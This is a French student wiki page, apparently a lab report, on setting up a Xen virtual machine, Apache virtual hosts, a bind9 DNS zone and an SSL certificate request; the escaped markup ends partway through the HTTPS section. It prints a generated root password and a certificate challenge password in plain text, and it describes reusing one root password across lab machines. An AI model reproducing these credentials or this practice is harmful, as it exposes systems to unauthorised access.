|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
